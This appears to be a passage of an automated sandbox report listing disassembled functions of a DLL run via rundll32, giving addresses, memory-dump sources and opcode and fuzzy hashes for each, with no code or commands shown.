                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4023145424-0
                                                                                                                                                                                                                            • Opcode ID: 56c4c178a23cc31852ea0ebb052358cc07ef0e38ad969230619843ba5d263d4a
                                                                                                                                                                                                                            • Instruction ID: 77279cf3eeab3e14be6f195bc9726e1776f791f7620e0279809c134d7896bbf0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56c4c178a23cc31852ea0ebb052358cc07ef0e38ad969230619843ba5d263d4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEE1B376300A8885FBE29B6199903EE23A4F789BCDF45C016FE89476D6DE78C749C704
                                                                                                                                                                                                                            Function 00000001800317BC Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: cc5e10080f149e09e57211d549632825893145c6601ee63450cfbcf535c8bfee
                                                                                                                                                                                                                            • Instruction ID: cf9f1a1a76af3e22ffb3a033e27da56738f6273f9c6aad8e16eddd2cf9f9d95b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc5e10080f149e09e57211d549632825893145c6601ee63450cfbcf535c8bfee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36E1C1322006488EEBEB8B2980543EF67A1E74DBDAF16C216EE55473D5DF31CA4AC345
                                                                                                                                                                                                                            Function 0000000180031388 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 53f997af8b16780f32270dd1e03c5e8f96834f393b39c7f084f8a70f450ff813
                                                                                                                                                                                                                            • Instruction ID: fc5242de98a98078d29e574a23c233c97642eb225e529145045871893847ef70
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53f997af8b16780f32270dd1e03c5e8f96834f393b39c7f084f8a70f450ff813
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE1DF76204A488AEBEB8B2981453EF27A1E74DBD9F1AC215EE45473D5CF31CA4AC341
                                                                                                                                                                                                                            Function 0000000180031C08 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1d62b8fa1e4c8e9584360644486b5da139b5c97442cbe4db3f6c405ac09e3abb
                                                                                                                                                                                                                            • Instruction ID: 2fb9876cb924c654e1a92a295d9e357a88d411f9f897ee289f15d9c14fb5bd2f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d62b8fa1e4c8e9584360644486b5da139b5c97442cbe4db3f6c405ac09e3abb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66E1AD3220064C8EEBEB8A2984443EF27A1E74DBD9F16D215EE55573D5CF36CA4AC341
                                                                                                                                                                                                                            Function 0000000180033E98 Relevance: .3, Instructions: 343COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e0b22ea47f15b799573d0c42c678d6c64486c493a64f0d9ac74df0d14aaf1cc9
                                                                                                                                                                                                                            • Instruction ID: bee2f10f8c844a908d38d8522c9e2d18e5beaeacfe055931c5fd83903b0c277f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0b22ea47f15b799573d0c42c678d6c64486c493a64f0d9ac74df0d14aaf1cc9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE19F3360064886EBEB8F1980417AF37A0F748BC4F969229FF594B294DF35DA5AC744
                                                                                                                                                                                                                            Function 000000018003430C Relevance: .3, Instructions: 339COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3983facea5675f8c27cd76ab693c5e98d47e7861da3570267e16c0786abcd8c5
                                                                                                                                                                                                                            • Instruction ID: de5992190240ec4e6f76b57faf21ac29fff0e8485e29332f9eb04aab00664416
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3983facea5675f8c27cd76ab693c5e98d47e7861da3570267e16c0786abcd8c5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69D1AE7760464882EBEB8F1980407AE37A0F708BC8F56C226EE494F795DF35DA5AC741
                                                                                                                                                                                                                            Function 0000000180033A3C Relevance: .3, Instructions: 339COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ae0b76b474f3854f377783c25ebce5fb6a80883f8d4c1ed076a77783ef6e9940
                                                                                                                                                                                                                            • Instruction ID: 0a97d19eddc071201514cf8863b13b6103f6614473f8ede66e9c01af3f0aa553
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae0b76b474f3854f377783c25ebce5fb6a80883f8d4c1ed076a77783ef6e9940
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED1B23660064882EBEB8F1990827AE77A0F74CBC4F56D21AEF49473D4DF25CA5AC744
                                                                                                                                                                                                                            Function 0000000180032408 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 74a7d78c5a4a407bcd473d4065ae04be3546879453f409bc7754bf731981c1a8
                                                                                                                                                                                                                            • Instruction ID: f2e49a6792f83d9c93e042443434007d4b64967ab0bd9a25939beb0bfa28c29d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74a7d78c5a4a407bcd473d4065ae04be3546879453f409bc7754bf731981c1a8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63D1BC76604A4C86EBAB8B2984103EF37A1F70CBC8F168216EE55177D5DF35CA9AC740
                                                                                                                                                                                                                            Function 000000018003203C Relevance: .3, Instructions: 317COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5a7d6b37f6de492733ed5fdf904e14d810d1877580b8a8e203b71f83fe424c4b
                                                                                                                                                                                                                            • Instruction ID: 4916a1fd6ca36aca321d30aae32dcf123ac21f9e609645fa493c451f3b428d7b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a7d6b37f6de492733ed5fdf904e14d810d1877580b8a8e203b71f83fe424c4b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFD1BF3620064C86EBAB8F2995403EF27A1E75DBC8F168206EE59177D5CF35CA8ED740
                                                                                                                                                                                                                            Function 00000001800327EC Relevance: .3, Instructions: 317COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f27b40119101386ade739e971527a8a2e6986383d772bc8daa9a7fc88fad7083
                                                                                                                                                                                                                            • Instruction ID: 2690db39790606ba4f3d093a10012af9680e587b6714f0ce84f772e0cb91617c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f27b40119101386ade739e971527a8a2e6986383d772bc8daa9a7fc88fad7083
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20D1CF3220064C86EBBB8F2994003EF77A1E70DBC8F569206EE59572D5CF35CA4AD341
                                                                                                                                                                                                                            Function 000000018002C168 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ad5e34f42e4399166e1191f300be1a0a4f1ad20f6f49e172673cbe49e5130067
                                                                                                                                                                                                                            • Instruction ID: 027cf6dc914138b162769d54f0c84de6f0a33fc0cbd86b63e1d6b70293964ac8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad5e34f42e4399166e1191f300be1a0a4f1ad20f6f49e172673cbe49e5130067
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCB1817220478885E7ABCF39C4647AD3BA0F34DB88F28851AEB4A47395CF35C659D706
                                                                                                                                                                                                                            Function 000000018002C904 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 54d2fa4c1486907b7a0b1fc6e33726e63e817285bbe7b66863f887057b54e55b
                                                                                                                                                                                                                            • Instruction ID: 46c3015ea507949f1cb432f8e3152b4d573d8b163d757534ca73cbdeb9a826b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54d2fa4c1486907b7a0b1fc6e33726e63e817285bbe7b66863f887057b54e55b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFB19D72204B5886E7A78F39C0557AC3BA0F34DF88F28911AEB4A47395CF35C649D746
                                                                                                                                                                                                                            Function 0000000180042BFC Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a4c45a46cc6a74b1eefb24babdf8105f45a0b0d602f10a80df55fef8aaa37e3a
                                                                                                                                                                                                                            • Instruction ID: 01a0491de7bcf18f5e854f3ba060ab17c64d2502d99ab1e8eaddab0859744661
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4c45a46cc6a74b1eefb24babdf8105f45a0b0d602f10a80df55fef8aaa37e3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F81C672704B8846EBB5CB1A94C039A6A91F74D7D8F95C229FE8947B95CF3CC6488B04
                                                                                                                                                                                                                            Function 000000018002238C Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b4c8abb70c9a580d4b6c0daa1936e78a244c3e4befcdb9880359991c157b5417
                                                                                                                                                                                                                            • Instruction ID: 7f11454cf463af14c25d70b554fb2eddf71407f611759702169a26b357afa264
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4c8abb70c9a580d4b6c0daa1936e78a244c3e4befcdb9880359991c157b5417
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86519F72100A5896FBB79E69C4643EC23A0F74CBDCF15C215FA690A6D9CF39CA4AC741
                                                                                                                                                                                                                            Function 000000018002539C Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
